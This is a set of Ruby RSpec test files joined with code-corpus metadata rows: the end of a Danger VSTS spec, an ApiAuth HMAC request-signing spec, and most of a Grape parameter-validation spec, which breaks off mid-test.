let(:subject) { Danger::RequestSources::VSTS.new(stub_ci, env) }
describe "#new" do
it "should not raise uninitialized constant error" do
expect { described_class.new(stub_ci, env) }.not_to raise_error
end
end
describe "#host" do
it "sets the host specified by `DANGER_VSTS_HOST`" do
expect(subject.host).to eq("https://example.visualstudio.com/example")
end
end
describe "#validates_as_api_source" do
it "validates_as_api_source for non empty `DANGER_VSTS_API_TOKEN`" do
expect(subject.validates_as_api_source?).to be true
end
end
describe "#pr_json" do
before do
stub_pull_request
subject.fetch_details
end
it "has a non empty pr_json after `fetch_details`" do
expect(subject.pr_json).to be_truthy
end
describe "#pr_json[:pullRequestId]" do
it "has fetched the same pull request id as ci_sources's `pull_request_id`" do
expect(subject.pr_json[:pullRequestId]).to eq(1)
end
end
describe "#pr_json[:title]" do
it "has fetched the pull requests title" do
expect(subject.pr_json[:title]).to eq("This is a danger test")
end
end
end
describe "#no_danger_comments" do
before do
stub_get_comments_request_no_danger
end
it "has to post a new comment" do
allow(subject).to receive(:post_new_comment)
expect(subject).to receive(:post_new_comment)
subject.update_pull_request!(warnings: [], errors: [], messages: [], markdowns: [], danger_id: "danger", new_comment: false)
end
end
describe "#danger_comment_update" do
before do
stub_get_comments_request_with_danger
end
it "it has to update the previous comment" do
allow(subject).to receive(:update_old_comment)
expect(subject).to receive(:update_old_comment)
subject.update_pull_request!(warnings: [], errors: [], messages: [], markdowns: [], danger_id: "danger", new_comment: false)
end
end
end
| 28.756757 | 130 | 0.68938 |
2111320c7b14c244119b95eed6657f0cde96f0b5 | 6,549 | # encoding: UTF-8
require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
describe 'ApiAuth' do
describe 'generating secret keys' do
it 'should generate secret keys' do
ApiAuth.generate_secret_key
end
it 'should generate secret keys that are 88 characters' do
expect(ApiAuth.generate_secret_key.size).to be(88)
end
it 'should generate keys that have a Hamming Distance of at least 65' do
key1 = ApiAuth.generate_secret_key
key2 = ApiAuth.generate_secret_key
expect(Amatch::Hamming.new(key1).match(key2)).to be > 65
end
end
def hmac(secret_key, request, canonical_string = nil, digest = 'sha1')
canonical_string ||= ApiAuth::Headers.new(request).canonical_string
digest = OpenSSL::Digest.new(digest)
ApiAuth.b64_encode(OpenSSL::HMAC.digest(digest, secret_key, canonical_string))
end
describe '.sign!' do
let(:request) { RestClient::Request.new(:url => 'http://google.com', :method => :get) }
let(:headers) { ApiAuth::Headers.new(request) }
it 'generates date header before signing' do
expect(ApiAuth::Headers).to receive(:new).and_return(headers)
expect(headers).to receive(:set_date).ordered
expect(headers).to receive(:sign_header).ordered
ApiAuth.sign!(request, 'abc', '123')
end
it 'generates content-md5 header before signing' do
expect(ApiAuth::Headers).to receive(:new).and_return(headers)
expect(headers).to receive(:calculate_md5).ordered
expect(headers).to receive(:sign_header).ordered
ApiAuth.sign!(request, 'abc', '123')
end
it 'returns the same request object back' do
expect(ApiAuth.sign!(request, 'abc', '123')).to be request
end
it 'calculates the hmac_signature as expected' do
ApiAuth.sign!(request, '1044', '123')
signature = hmac('123', request)
expect(request.headers['Authorization']).to eq("APIAuth 1044:#{signature}")
end
context 'when passed the hmac digest option' do
let(:request) do
Net::HTTP::Put.new('/resource.xml?foo=bar&bar=foo',
'content-type' => 'text/plain',
'content-md5' => '1B2M2Y8AsgTpgAmY7PhCfg==',
'date' => Time.now.utc.httpdate)
end
let(:canonical_string) { ApiAuth::Headers.new(request).canonical_string }
it 'calculates the hmac_signature with http method' do
ApiAuth.sign!(request, '1044', '123', :digest => 'sha256')
signature = hmac('123', request, canonical_string, 'sha256')
expect(request['Authorization']).to eq("APIAuth-HMAC-SHA256 1044:#{signature}")
end
end
end
describe '.authentic?' do
let(:request) do
new_request = Net::HTTP::Put.new('/resource.xml?foo=bar&bar=foo',
'content-type' => 'text/plain',
'content-md5' => '1B2M2Y8AsgTpgAmY7PhCfg==',
'date' => Time.now.utc.httpdate)
signature = hmac('123', new_request)
new_request['Authorization'] = "APIAuth 1044:#{signature}"
new_request
end
it 'validates that the signature in the request header matches the way we sign it' do
expect(ApiAuth.authentic?(request, '123')).to eq true
end
it 'fails to validate a non matching signature' do
expect(ApiAuth.authentic?(request, '456')).to eq false
end
it 'fails to validate non matching md5' do
request['content-md5'] = '12345'
expect(ApiAuth.authentic?(request, '123')).to eq false
end
it 'fails to validate expired requests' do
request['date'] = 16.minutes.ago.utc.httpdate
expect(ApiAuth.authentic?(request, '123')).to eq false
end
it 'fails to validate if the date is invalid' do
request['date'] = '٢٠١٤-٠٩-٠٨ ١٦:٣١:١٤ +٠٣٠٠'
expect(ApiAuth.authentic?(request, '123')).to eq false
end
it 'fails to validate if the request method differs' do
canonical_string = ApiAuth::Headers.new(request).canonical_string(override_http_method: 'POST', with_http_method: true)
signature = hmac('123', request, canonical_string)
request['Authorization'] = "APIAuth 1044:#{signature}"
expect(ApiAuth.authentic?(request, '123')).to eq false
end
context 'when passed the hmac digest option' do
let(:request) do
new_request = Net::HTTP::Put.new('/resource.xml?foo=bar&bar=foo',
'content-type' => 'text/plain',
'content-md5' => '1B2M2Y8AsgTpgAmY7PhCfg==',
'date' => Time.now.utc.httpdate)
canonical_string = ApiAuth::Headers.new(new_request).canonical_string
signature = hmac('123', new_request, canonical_string, 'sha256')
new_request['Authorization'] = "APIAuth-HMAC-#{digest} 1044:#{signature}"
new_request
end
context 'valid request digest' do
let(:digest) { 'SHA256' }
context 'matching client digest' do
it 'validates matching digest' do
expect(ApiAuth.authentic?(request, '123', :digest => 'sha256')).to eq true
end
end
context 'different client digest' do
it 'raises an exception' do
expect { ApiAuth.authentic?(request, '123', :digest => 'sha512') }.to raise_error(ApiAuth::InvalidRequestDigest)
end
end
end
context 'invalid request digest' do
let(:digest) { 'SHA111' }
it 'fails validation' do
expect(ApiAuth.authentic?(request, '123', :digest => 'sha111')).to eq false
end
end
end
end
describe '.access_id' do
context 'normal APIAuth Auth header' do
let(:request) do
RestClient::Request.new(
:url => 'http://google.com',
:method => :get,
:headers => { :authorization => 'APIAuth 1044:aGVsbG8gd29ybGQ=' }
)
end
it 'parses it from the Auth Header' do
expect(ApiAuth.access_id(request)).to eq('1044')
end
end
context 'Corporate prefixed APIAuth header' do
let(:request) do
RestClient::Request.new(
:url => 'http://google.com',
:method => :get,
:headers => { :authorization => 'Corporate APIAuth 1044:aGVsbG8gd29ybGQ=' }
)
end
it 'parses it from the Auth Header' do
expect(ApiAuth.access_id(request)).to eq('1044')
end
end
end
end
| 35.209677 | 125 | 0.614598 |
ac1f1df338609e6491750768710b3e57dc0deca7 | 66,985 | # frozen_string_literal: true
require 'spec_helper'
describe Grape::Validations do
subject { Class.new(Grape::API) }
def app
subject
end
def declared_params
subject.namespace_stackable(:declared_params).flatten
end
describe 'params' do
context 'optional' do
before do
subject.params do
optional :a_number, regexp: /^[0-9]+$/
optional :attachment, type: File
end
subject.get '/optional' do
'optional works!'
end
end
it 'validates when params is present' do
get '/optional', a_number: 'string'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('a_number is invalid')
get '/optional', a_number: 45
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional works!')
end
it "doesn't validate when param not present" do
get '/optional', a_number: nil, attachment: nil
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional works!')
end
it 'adds to declared parameters' do
subject.params do
optional :some_param
end
expect(declared_params).to eq([:some_param])
end
end
context 'optional using Grape::Entity documentation' do
def define_optional_using
documentation = { field_a: { type: String }, field_b: { type: String } }
subject.params do
optional :all, using: documentation
end
end
before do
define_optional_using
subject.get '/optional' do
'optional with using works'
end
end
it 'adds entity documentation to declared params' do
define_optional_using
expect(declared_params).to eq(%i[field_a field_b])
end
it 'works when field_a and field_b are not present' do
get '/optional'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional with using works')
end
it 'works when field_a is present' do
get '/optional', field_a: 'woof'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional with using works')
end
it 'works when field_b is present' do
get '/optional', field_b: 'woof'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional with using works')
end
end
context 'required' do
before do
subject.params do
requires :key, type: String
end
subject.get('/required') { 'required works' }
subject.put('/required') { { key: params[:key] }.to_json }
end
it 'errors when param not present' do
get '/required'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('key is missing')
end
it "doesn't throw a missing param when param is present" do
get '/required', key: 'cool'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required works')
end
it 'adds to declared parameters' do
subject.params do
requires :some_param
end
expect(declared_params).to eq([:some_param])
end
it 'works when required field is present but nil' do
put '/required', { key: nil }.to_json, 'CONTENT_TYPE' => 'application/json'
expect(last_response.status).to eq(200)
expect(JSON.parse(last_response.body)).to eq('key' => nil)
end
end
context 'requires with nested params' do
before do
subject.params do
requires :first_level, type: Hash do
optional :second_level, type: Array do
requires :value, type: Integer
optional :name, type: String
optional :third_level, type: Array do
requires :value, type: Integer
optional :name, type: String
optional :fourth_level, type: Array do
requires :value, type: Integer
optional :name, type: String
end
end
end
end
end
subject.put('/required') { 'required works' }
end
let(:request_params) do
{
first_level: {
second_level: [
{ value: 1, name: 'Lisa' },
{
value: 2,
name: 'James',
third_level: [
{ value: 'three', name: 'Sophie' },
{
value: 4,
name: 'Jenny',
fourth_level: [
{ name: 'Samuel' }, { value: 6, name: 'Jane' }
]
}
]
}
]
}
}
end
it 'validates correctly in deep nested params' do
put '/required', request_params.to_json, 'CONTENT_TYPE' => 'application/json'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq(
'first_level[second_level][1][third_level][0][value] is invalid, ' \
'first_level[second_level][1][third_level][1][fourth_level][0][value] is missing'
)
end
end
context 'requires :all using Grape::Entity documentation' do
def define_requires_all
documentation = {
required_field: { type: String },
optional_field: { type: String }
}
subject.params do
requires :all, except: :optional_field, using: documentation
end
end
before do
define_requires_all
subject.get '/required' do
'required works'
end
end
it 'adds entity documentation to declared params' do
define_requires_all
expect(declared_params).to eq(%i[required_field optional_field])
end
it 'errors when required_field is not present' do
get '/required'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('required_field is missing')
end
it 'works when required_field is present' do
get '/required', required_field: 'woof'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required works')
end
end
context 'requires :none using Grape::Entity documentation' do
def define_requires_none
documentation = {
required_field: { type: String },
optional_field: { type: String }
}
subject.params do
requires :none, except: :required_field, using: documentation
end
end
before do
define_requires_none
subject.get '/required' do
'required works'
end
end
it 'adds entity documentation to declared params' do
define_requires_none
expect(declared_params).to eq(%i[required_field optional_field])
end
it 'errors when required_field is not present' do
get '/required'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('required_field is missing')
end
it 'works when required_field is present' do
get '/required', required_field: 'woof'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required works')
end
end
context 'requires :all or :none but except a non-existent field using Grape::Entity documentation' do
context 'requires :all' do
def define_requires_all
documentation = {
required_field: { type: String },
optional_field: { type: String }
}
subject.params do
requires :all, except: :non_existent_field, using: documentation
end
end
it 'adds only the entity documentation to declared params, nothing more' do
define_requires_all
expect(declared_params).to eq(%i[required_field optional_field])
end
end
context 'requires :none' do
def define_requires_none
documentation = {
required_field: { type: String },
optional_field: { type: String }
}
subject.params do
requires :none, except: :non_existent_field, using: documentation
end
end
it 'adds only the entity documentation to declared params, nothing more' do
expect { define_requires_none }.to raise_error(ArgumentError)
end
end
end
context 'required with an Array block' do
before do
subject.params do
requires :items, type: Array do
requires :key
end
end
subject.get('/required') { 'required works' }
subject.put('/required') { { items: params[:items] }.to_json }
end
it 'errors when param not present' do
get '/required'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is missing')
end
it 'errors when param is not an Array' do
get '/required', items: 'hello'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid')
get '/required', items: { key: 'foo' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid')
end
it "doesn't throw a missing param when param is present" do
get '/required', items: [{ key: 'hello' }, { key: 'world' }]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required works')
end
it "doesn't throw a missing param when param is present but empty" do
put '/required', { items: [] }.to_json, 'CONTENT_TYPE' => 'application/json'
expect(last_response.status).to eq(200)
expect(JSON.parse(last_response.body)).to eq('items' => [])
end
it 'adds to declared parameters' do
subject.params do
requires :items, type: Array do
requires :key
end
end
expect(declared_params).to eq([items: [:key]])
end
end
# Ensure there is no leakage between declared Array types and
# subsequent Hash types
context 'required with an Array and a Hash block' do
before do
subject.params do
requires :cats, type: Array[String], default: []
requires :items, type: Hash do
requires :key
end
end
subject.get '/required' do
'required works'
end
end
it 'does not output index [0] for Hash types' do
get '/required', cats: ['Garfield'], items: { foo: 'bar' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items[key] is missing')
end
end
context 'required with a Hash block' do
before do
subject.params do
requires :items, type: Hash do
requires :key
end
end
subject.get '/required' do
'required works'
end
end
it 'errors when param not present' do
get '/required'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is missing, items[key] is missing')
end
it 'errors when nested param not present' do
get '/required', items: { foo: 'bar' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items[key] is missing')
end
it 'errors when param is not a Hash' do
get '/required', items: 'hello'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid, items[key] is missing')
get '/required', items: [{ key: 'foo' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid')
end
it "doesn't throw a missing param when param is present" do
get '/required', items: { key: 'hello' }
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required works')
end
it 'adds to declared parameters' do
subject.params do
requires :items, type: Array do
requires :key
end
end
expect(declared_params).to eq([items: [:key]])
end
end
context 'hash with a required param with validation' do
before do
subject.params do
requires :items, type: Hash do
requires :key, type: String, values: %w[a b]
end
end
subject.get '/required' do
'required works'
end
end
it 'errors when param is not a Hash' do
get '/required', items: 'not a hash'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid, items[key] is missing, items[key] is invalid')
get '/required', items: [{ key: 'hash in array' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid, items[key] does not have a valid value')
end
it 'works when all params match' do
get '/required', items: { key: 'a' }
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required works')
end
end
context 'group' do
before do
subject.params do
group :items, type: Array do
requires :key
end
end
subject.get '/required' do
'required works'
end
end
it 'errors when param not present' do
get '/required'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is missing')
end
it "doesn't throw a missing param when param is present" do
get '/required', items: [key: 'hello']
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required works')
end
it 'adds to declared parameters' do
subject.params do
group :items, type: Array do
requires :key
end
end
expect(declared_params).to eq([items: [:key]])
end
end
context 'group params with nested params which has a type' do
let(:invalid_items) { { items: '' } }
before do
subject.params do
optional :items, type: Array do
optional :key1, type: String
optional :key2, type: String
end
end
subject.post '/group_with_nested' do
'group with nested works'
end
end
it 'errors when group param is invalid' do
post '/group_with_nested', items: invalid_items
expect(last_response.status).to eq(400)
end
end
context 'custom validator for a Hash' do
let(:date_range_validator) do
Class.new(Grape::Validations::Validators::Base) do
def validate_param!(attr_name, params)
return if params[attr_name][:from] <= params[attr_name][:to]
raise Grape::Exceptions::Validation.new(params: [@scope.full_name(attr_name)], message: "'from' must be lower or equal to 'to'")
end
end
end
before do
described_class.register_validator('date_range', date_range_validator)
end
after do
described_class.deregister_validator('date_range')
end
before do
subject.params do
optional :date_range, date_range: true, type: Hash do
requires :from, type: Integer
requires :to, type: Integer
end
end
subject.get('/optional') do
'optional works'
end
subject.params do
requires :date_range, date_range: true, type: Hash do
requires :from, type: Integer
requires :to, type: Integer
end
end
subject.get('/required') do
'required works'
end
end
context 'which is optional' do
it "doesn't throw an error if the validation passes" do
get '/optional', date_range: { from: 1, to: 2 }
expect(last_response.status).to eq(200)
end
it 'errors if the validation fails' do
get '/optional', date_range: { from: 2, to: 1 }
expect(last_response.status).to eq(400)
end
end
context 'which is required' do
it "doesn't throw an error if the validation passes" do
get '/required', date_range: { from: 1, to: 2 }
expect(last_response.status).to eq(200)
end
it 'errors if the validation fails' do
get '/required', date_range: { from: 2, to: 1 }
expect(last_response.status).to eq(400)
end
end
end
context 'validation within arrays' do
before do
subject.params do
group :children, type: Array do
requires :name
group :parents, type: Array do
requires :name, allow_blank: false
end
end
end
subject.get '/within_array' do
'within array works'
end
end
it 'can handle new scopes within child elements' do
get '/within_array', children: [
{ name: 'John', parents: [{ name: 'Jane' }, { name: 'Bob' }] },
{ name: 'Joe', parents: [{ name: 'Josie' }] }
]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('within array works')
end
it 'errors when a parameter is not present' do
get '/within_array', children: [
{ name: 'Jim', parents: [{ name: 'Joy' }] },
{ name: 'Job', parents: [{}] }
]
# NOTE: with body parameters in json or XML or similar this
# should actually fail with: children[parents][name] is missing.
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children[1][parents] is missing, children[0][parents][1][name] is missing, children[0][parents][1][name] is empty')
end
it 'errors when a parameter is not present in array within array' do
get '/within_array', children: [
{ name: 'Jim', parents: [{ name: 'Joy' }] },
{ name: 'Job', parents: [{ name: 'Bill' }, { name: '' }] }
]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children[1][parents][1][name] is empty')
end
it 'handle errors for all array elements' do
get '/within_array', children: [
{ name: 'Jim', parents: [] },
{ name: 'Job', parents: [] }
]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq(
'children[0][parents][0][name] is missing, ' \
'children[1][parents][0][name] is missing'
)
end
it 'safely handles empty arrays and blank parameters' do
# NOTE: with body parameters in json or XML or similar this
# should actually return 200, since an empty array is valid.
get '/within_array', children: []
expect(last_response.status).to eq(400)
expect(last_response.body).to eq(
'children[0][name] is missing, ' \
'children[0][parents] is missing, ' \
'children[0][parents] is invalid, ' \
'children[0][parents][0][name] is missing, ' \
'children[0][parents][0][name] is empty'
)
get '/within_array', children: [name: 'Jay']
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children[0][parents] is missing, children[0][parents][0][name] is missing, children[0][parents][0][name] is empty')
end
it 'errors when param is not an Array' do
get '/within_array', children: 'hello'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children is invalid')
get '/within_array', children: { name: 'foo' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children is invalid')
get '/within_array', children: [name: 'Jay', parents: { name: 'Fred' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children[0][parents] is invalid')
end
end
context 'with block param' do
before do
subject.params do
requires :planets, type: Array do
requires :name
end
end
subject.get '/req' do
'within array works'
end
subject.put '/req' do
''
end
subject.params do
group :stars, type: Array do
requires :name
end
end
subject.get '/grp' do
'within array works'
end
subject.put '/grp' do
''
end
subject.params do
requires :name
optional :moons, type: Array do
requires :name
end
end
subject.get '/opt' do
'within array works'
end
subject.put '/opt' do
''
end
end
it 'requires defaults to Array type' do
get '/req', planets: 'Jupiter, Saturn'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('planets is invalid')
get '/req', planets: { name: 'Jupiter' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('planets is invalid')
get '/req', planets: [{ name: 'Venus' }, { name: 'Mars' }]
expect(last_response.status).to eq(200)
put_with_json '/req', planets: []
expect(last_response.status).to eq(200)
end
it 'optional defaults to Array type' do
get '/opt', name: 'Jupiter', moons: 'Europa, Ganymede'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('moons is invalid')
get '/opt', name: 'Jupiter', moons: { name: 'Ganymede' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('moons is invalid')
get '/opt', name: 'Jupiter', moons: [{ name: 'Io' }, { name: 'Callisto' }]
expect(last_response.status).to eq(200)
put_with_json '/opt', name: 'Venus'
expect(last_response.status).to eq(200)
put_with_json '/opt', name: 'Mercury', moons: []
expect(last_response.status).to eq(200)
end
it 'group defaults to Array type' do
get '/grp', stars: 'Sun'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('stars is invalid')
get '/grp', stars: { name: 'Sun' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('stars is invalid')
get '/grp', stars: [{ name: 'Sun' }]
expect(last_response.status).to eq(200)
put_with_json '/grp', stars: []
expect(last_response.status).to eq(200)
end
end
context 'validation within arrays with JSON' do
before do
subject.params do
group :children, type: Array do
requires :name
group :parents, type: Array do
requires :name
end
end
end
subject.put '/within_array' do
'within array works'
end
end
it 'can handle new scopes within child elements' do
put_with_json '/within_array', children: [
{ name: 'John', parents: [{ name: 'Jane' }, { name: 'Bob' }] },
{ name: 'Joe', parents: [{ name: 'Josie' }] }
]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('within array works')
end
it 'errors when a parameter is not present' do
put_with_json '/within_array', children: [
{ name: 'Jim', parents: [{}] },
{ name: 'Job', parents: [{ name: 'Joy' }] }
]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children[0][parents][0][name] is missing')
end
it 'safely handles empty arrays and blank parameters' do
put_with_json '/within_array', children: []
expect(last_response.status).to eq(200)
put_with_json '/within_array', children: [name: 'Jay']
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children[0][parents] is missing, children[0][parents][0][name] is missing')
end
end
context 'optional with an Array block' do
before do
subject.params do
optional :items, type: Array do
requires :key
end
end
subject.get '/optional_group' do
'optional group works'
end
end
it "doesn't throw a missing param when the group isn't present" do
get '/optional_group'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional group works')
end
it "doesn't throw a missing param when both group and param are given" do
get '/optional_group', items: [{ key: 'foo' }]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional group works')
end
it 'errors when group is present, but required param is not' do
get '/optional_group', items: [{ not_key: 'foo' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items[0][key] is missing')
end
it "errors when param is present but isn't an Array" do
get '/optional_group', items: 'hello'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid')
get '/optional_group', items: { key: 'foo' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid')
end
it 'adds to declared parameters' do
subject.params do
optional :items, type: Array do
requires :key
end
end
expect(declared_params).to eq([items: [:key]])
end
end
context 'nested optional Array blocks' do
before do
subject.params do
optional :items, type: Array do
requires :key
optional(:optional_subitems, type: Array) { requires :value }
requires(:required_subitems, type: Array) { requires :value }
end
end
subject.get('/nested_optional_group') { 'nested optional group works' }
end
it 'does no internal validations if the outer group is blank' do
get '/nested_optional_group'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('nested optional group works')
end
it 'does internal validations if the outer group is present' do
get '/nested_optional_group', items: [{ key: 'foo' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items[0][required_subitems] is missing, items[0][required_subitems][0][value] is missing')
get '/nested_optional_group', items: [{ key: 'foo', required_subitems: [{ value: 'bar' }] }]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('nested optional group works')
end
it 'handles deep nesting' do
get '/nested_optional_group', items: [{ key: 'foo', required_subitems: [{ value: 'bar' }], optional_subitems: [{ not_value: 'baz' }] }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items[0][optional_subitems][0][value] is missing')
get '/nested_optional_group', items: [{ key: 'foo', required_subitems: [{ value: 'bar' }], optional_subitems: [{ value: 'baz' }] }]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('nested optional group works')
end
it 'handles validation within arrays' do
get '/nested_optional_group', items: [{ key: 'foo' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items[0][required_subitems] is missing, items[0][required_subitems][0][value] is missing')
get '/nested_optional_group', items: [{ key: 'foo', required_subitems: [{ value: 'bar' }] }]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('nested optional group works')
get '/nested_optional_group', items: [{ key: 'foo', required_subitems: [{ value: 'bar' }], optional_subitems: [{ not_value: 'baz' }] }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items[0][optional_subitems][0][value] is missing')
end
it 'adds to declared parameters' do
subject.params do
optional :items, type: Array do
requires :key
optional(:optional_subitems, type: Array) { requires :value }
requires(:required_subitems, type: Array) { requires :value }
end
end
expect(declared_params).to eq([items: [:key, { optional_subitems: [:value] }, { required_subitems: [:value] }]])
end
context <<~DESC do
Issue occurs whenever:
* param structure with at least three levels
* 1st level item is a required Array that has >1 entry with an optional item present and >1 entry with an optional item missing#{' '}
* 2nd level is an optional Array or Hash#{' '}
* 3rd level is a required item (can be any type)
* additional levels do not effect the issue from occuring
DESC
it 'example based off actual real world use case' do
subject.params do
requires :orders, type: Array do
requires :id, type: Integer
optional :drugs, type: Array do
requires :batches, type: Array do
requires :batch_no, type: String
end
end
end
end
subject.get '/validate_required_arrays_under_optional_arrays' do
'validate_required_arrays_under_optional_arrays works!'
end
data = {
orders: [
{ id: 77, drugs: [{ batches: [{ batch_no: 'A1234567' }] }] },
{ id: 70 }
]
}
get '/validate_required_arrays_under_optional_arrays', data
expect(last_response.body).to eq('validate_required_arrays_under_optional_arrays works!')
expect(last_response.status).to eq(200)
end
it 'simplest example using Array -> Array -> Hash -> String' do
subject.params do
requires :orders, type: Array do
requires :id, type: Integer
optional :drugs, type: Array do
requires :batch_no, type: String
end
end
end
subject.get '/validate_required_arrays_under_optional_arrays' do
'validate_required_arrays_under_optional_arrays works!'
end
data = {
orders: [
{ id: 77, drugs: [{ batch_no: 'A1234567' }] },
{ id: 70 }
]
}
get '/validate_required_arrays_under_optional_arrays', data
expect(last_response.body).to eq('validate_required_arrays_under_optional_arrays works!')
expect(last_response.status).to eq(200)
end
it 'simplest example using Array -> Hash -> String' do
subject.params do
requires :orders, type: Array do
requires :id, type: Integer
optional :drugs, type: Hash do
requires :batch_no, type: String
end
end
end
subject.get '/validate_required_arrays_under_optional_arrays' do
'validate_required_arrays_under_optional_arrays works!'
end
data = {
orders: [
{ id: 77, drugs: { batch_no: 'A1234567' } },
{ id: 70 }
]
}
get '/validate_required_arrays_under_optional_arrays', data
expect(last_response.body).to eq('validate_required_arrays_under_optional_arrays works!')
expect(last_response.status).to eq(200)
end
it 'correctly indexes invalida data' do
subject.params do
requires :orders, type: Array do
requires :id, type: Integer
optional :drugs, type: Array do
requires :batch_no, type: String
requires :quantity, type: Integer
end
end
end
subject.get '/correctly_indexes' do
'correctly_indexes works!'
end
data = {
orders: [
{ id: 70 },
{ id: 77, drugs: [{ batch_no: 'A1234567', quantity: 12 }, { batch_no: 'B222222' }] }
]
}
get '/correctly_indexes', data
expect(last_response.body).to eq('orders[1][drugs][1][quantity] is missing')
expect(last_response.status).to eq(400)
end
context 'multiple levels of optional and requires settings' do
before do
subject.params do
requires :top, type: Array do
requires :top_id, type: Integer, allow_blank: false
optional :middle_1, type: Array do
requires :middle_1_id, type: Integer, allow_blank: false
optional :middle_2, type: Array do
requires :middle_2_id, type: String, allow_blank: false
optional :bottom, type: Array do
requires :bottom_id, type: Integer, allow_blank: false
end
end
end
end
end
subject.get '/multi_level' do
'multi_level works!'
end
end
it 'with valid data' do
data = {
top: [
{ top_id: 1, middle_1: [
{ middle_1_id: 11 }, { middle_1_id: 12, middle_2: [
{ middle_2_id: 121 }, { middle_2_id: 122, bottom: [{ bottom_id: 1221 }] }
] }
] },
{ top_id: 2, middle_1: [
{ middle_1_id: 21 }, { middle_1_id: 22, middle_2: [
{ middle_2_id: 221 }
] }
] },
{ top_id: 3, middle_1: [
{ middle_1_id: 31 }, { middle_1_id: 32 }
] },
{ top_id: 4 }
]
}
get '/multi_level', data
expect(last_response.body).to eq('multi_level works!')
expect(last_response.status).to eq(200)
end
it 'with invalid data' do
data = {
top: [
{ top_id: 1, middle_1: [
{ middle_1_id: 11 }, { middle_1_id: 12, middle_2: [
{ middle_2_id: 121 }, { middle_2_id: 122, bottom: [{ bottom_id: nil }] }
] }
] },
{ top_id: 2, middle_1: [
{ middle_1_id: 21 }, { middle_1_id: 22, middle_2: [{ middle_2_id: nil }] }
] },
{ top_id: 3, middle_1: [
{ middle_1_id: nil }, { middle_1_id: 32 }
] },
{ top_id: nil, missing_top_id: 4 }
]
}
# debugger
get '/multi_level', data
expect(last_response.body.split(', ')).to match_array([
'top[3][top_id] is empty',
'top[2][middle_1][0][middle_1_id] is empty',
'top[1][middle_1][1][middle_2][0][middle_2_id] is empty',
'top[0][middle_1][1][middle_2][1][bottom][0][bottom_id] is empty'
])
expect(last_response.status).to eq(400)
end
end
end
it 'exactly_one_of' do
subject.params do
requires :orders, type: Array do
requires :id, type: Integer
optional :drugs, type: Hash do
optional :batch_no, type: String
optional :batch_id, type: String
exactly_one_of :batch_no, :batch_id
end
end
end
subject.get '/exactly_one_of' do
'exactly_one_of works!'
end
data = {
orders: [
{ id: 77, drugs: { batch_no: 'A1234567' } },
{ id: 70 }
]
}
get '/exactly_one_of', data
expect(last_response.body).to eq('exactly_one_of works!')
expect(last_response.status).to eq(200)
end
it 'at_least_one_of' do
subject.params do
requires :orders, type: Array do
requires :id, type: Integer
optional :drugs, type: Hash do
optional :batch_no, type: String
optional :batch_id, type: String
at_least_one_of :batch_no, :batch_id
end
end
end
subject.get '/at_least_one_of' do
'at_least_one_of works!'
end
data = {
orders: [
{ id: 77, drugs: { batch_no: 'A1234567' } },
{ id: 70 }
]
}
get '/at_least_one_of', data
expect(last_response.body).to eq('at_least_one_of works!')
expect(last_response.status).to eq(200)
end
it 'all_or_none_of' do
subject.params do
requires :orders, type: Array do
requires :id, type: Integer
optional :drugs, type: Hash do
optional :batch_no, type: String
optional :batch_id, type: String
all_or_none_of :batch_no, :batch_id
end
end
end
subject.get '/all_or_none_of' do
